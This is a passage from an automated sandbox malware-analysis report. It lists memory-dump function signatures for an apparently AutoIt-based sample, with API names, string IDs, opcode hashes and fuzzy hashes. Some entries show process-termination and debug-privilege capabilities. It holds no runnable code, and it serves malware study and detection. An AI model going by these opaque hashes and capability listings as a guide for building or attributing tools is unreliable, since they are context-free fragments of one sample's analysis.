                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 2479661705-3771769585
                                                                      • Opcode ID: c022dea36b0d6b041929f70b141b9e152a2f360cd32598783c827dc949a89afb
                                                                      • Instruction ID: 3383e226eecea2b0f62ffc2bce3cb65f9a719936b955a620d2302d636eb7bc89
                                                                      • Opcode Fuzzy Hash: c022dea36b0d6b041929f70b141b9e152a2f360cd32598783c827dc949a89afb
                                                                      • Instruction Fuzzy Hash: E4215E61A8C98281EA24BF15E9453BDE360BF94BA4FC04135D64E867A5DF6CF984C3A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                      • String ID:
                                                                      • API String ID: 2672075419-0
                                                                      • Opcode ID: 5fa25485af76456d7d7e616ea4c07056e60c9aaa2ebc56c0ea0a72266ee9f790
                                                                      • Instruction ID: 0e54133614bd1ada43f495ddcefddc211f41306e9019f2d87e71a8a1af970240
                                                                      • Opcode Fuzzy Hash: 5fa25485af76456d7d7e616ea4c07056e60c9aaa2ebc56c0ea0a72266ee9f790
                                                                      • Instruction Fuzzy Hash: 6F91A036B0C6528AEB60AF61D4443BDA3A1FB44BACF900035DE0D93789CF38F48583A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                      • Instruction ID: cad5dcb2917a43f6b02216cffce2194f1b4e4f0432bde13c8c2aeac07a0ded80
                                                                      • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                      • Instruction Fuzzy Hash: E1316334B0C65286E755BF69A444639F2A2BB447A4F905534CC0AC3754DF7DF88586A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 685491774-0
                                                                      • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                      • Instruction ID: 0aea2de766804d83cac725849cfde9317e5c311fbec6d4968dd28152604d5acc
                                                                      • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                      • Instruction Fuzzy Hash: 3D118E35B0C51282F705BF66A85856A6261BFCCFA4F805039CA0A8BB50DF7DE09487A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 0-1603158881
                                                                      • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                      • Instruction ID: ba13a836f5d301d252db540d1e67f8c75ddb0b8824807a2a45a39d05dc02afd4
                                                                      • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                      • Instruction Fuzzy Hash: 9512A262B5866392EA68BF34C8652F9E290BF54764FC44631CE1DC6390EF7CF584C2A4
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Init$Clear
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                      • API String ID: 3467423407-1765764032
                                                                      • Opcode ID: a0470de27205f542ebe67e6bc39c13d5e7d83ba962feb8b7bffed10a95e69b5b
                                                                      • Instruction ID: b6ed1c6cfa923cfb32d77b7e8317b2fab7bffd36f35bb293733096767224fc00
                                                                      • Opcode Fuzzy Hash: a0470de27205f542ebe67e6bc39c13d5e7d83ba962feb8b7bffed10a95e69b5b
                                                                      • Instruction Fuzzy Hash: 5EA1D332A08B4586EB10FF66E4405ADB7A0FB88BA8F854132DE9D83754DF3CE545C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                      • String ID: -----$SysListView32
                                                                      • API String ID: 2361508679-3975388722
                                                                      • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                      • Instruction ID: c4ef3d9a7dedc4b26e862551c0bf543708e0f1097488c5e1ebb2a1c41e042645
                                                                      • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                      • Instruction Fuzzy Hash: BC51B332A047918AE720EF65D8446DEB3B5FB84798F80413AEE4D87B55CF39E594CB80
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 2019164449-3381328864
                                                                      • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                      • Instruction ID: b8d4ff95fda8e5ee92dfb4c011bc0cc79b24c3310e9983573d95c99732bba480
                                                                      • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                      • Instruction Fuzzy Hash: C9214F21B5C90380FA60BF25E954679A3A0AF91BE8F804136CE0DC7795EF6CF54687E4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                      • String ID:
                                                                      • API String ID: 1903627254-0
                                                                      • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                      • Instruction ID: 849b3b96e54bb8f6649f0fd92220d530042e8b543a2ff7edb3c645451d484450
                                                                      • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                      • Instruction Fuzzy Hash: 7F028262A58A8681DB50EF26D4441ADB770FB84FA8F904032DF9E87764DF3CE649C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                      • Instruction ID: ff80490076cb52c0e16ff2eda12c0d65e311375992adb558d19223e819b7dba6
                                                                      • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                      • Instruction Fuzzy Hash: FD619121A8C5468AE724BE2589507BA9251BB807F8FE08431DA1D82795CF7DF48493A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                      • Instruction ID: 249b0e93ab2f8c1c0ef7d7757773fd53708b3d89948a93e30e008864950a58af
                                                                      • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                      • Instruction Fuzzy Hash: 2F213C76519B4182E710DF52E44836AB7A0FB89FEAF844125DE8D43B54CF7DE1888B50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID: ?
                                                                      • API String ID: 500310315-1684325040
                                                                      • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                      • Instruction ID: 27766ea9512fbb8c6ce65794a86d3adf32e9f9aea369e6fb8cff9ffad06900c9
                                                                      • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                      • Instruction Fuzzy Hash: 6C616C32A4C65286EB60BF21E8405A9B7A4FB447B4FC41136EA0D82795DF3CF581C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 3721556410-2107944366
                                                                      • Opcode ID: c2c051044bb7c7ddb3348d31f55c8e9a75bf2736cbd24ec39817eaf22698c765
                                                                      • Instruction ID: 3054488203b3187c4c18a1d15c21c4ca265b964f75054d3e0c15cf4131653298
                                                                      • Opcode Fuzzy Hash: c2c051044bb7c7ddb3348d31f55c8e9a75bf2736cbd24ec39817eaf22698c765
                                                                      • Instruction Fuzzy Hash: BF616226A18A5285E700FF61D8805EDB770FB44BA8F901532DE1D937A5DF38F585C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                      • Instruction ID: 156fe1d19f377d0a2750b7c1cb288ddfafab2703fef0a6e7104d1ce62fd92471
                                                                      • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                      • Instruction Fuzzy Hash: E5517E66A5864682FB10FF25D090378BB60FF94BA5F858931D60E87792DF7CF4448BA0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                      • String ID: 2$P
                                                                      • API String ID: 93392585-1110268094
                                                                      • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                      • Instruction ID: 5f5844d8b627123d86d716c46b36ce98b59f4716273e4abc0a91b86aa59633b8
                                                                      • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                      • Instruction Fuzzy Hash: 6F51F632A4966289F714BF65E44427DB7A5BB407ECF9C4135CA5D83794CF3AF4818360
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$LongMessageSend$Show
                                                                      • String ID: '
                                                                      • API String ID: 257662517-1997036262
                                                                      • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                      • Instruction ID: 9d7c5aef6648875ca66046ad488800c79d194ccbbddd117bf183e1555c365335
                                                                      • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                      • Instruction Fuzzy Hash: 53510A32A4964289E364BF65A458A7DB761FB81BA0FD44132CE5E83790DF3CF442C350
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad_invalid_parameter_noinfo
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 4060274358-404129466
                                                                      • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                      • Instruction ID: 7b42bae9f2d935e61358697e50677872f8ec9e751cbcdd219dba8ecd6d46ba2e
                                                                      • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                      • Instruction Fuzzy Hash: 36217C21A8C79385FA54BF2AA90017AE361AF547E8FC84035DD4DC2395EF7DF88182E0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4051287042-3128320259
                                                                      • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                      • Instruction ID: 712ca21972eaed21ade891f9249ba7deec89eb11bf192e7c0dbef2c740a48c80
                                                                      • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                      • Instruction Fuzzy Hash: 9811307161CB8591E725AF20F4447EAA264FB48B58FC05036DA8E82758DF7CE185C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
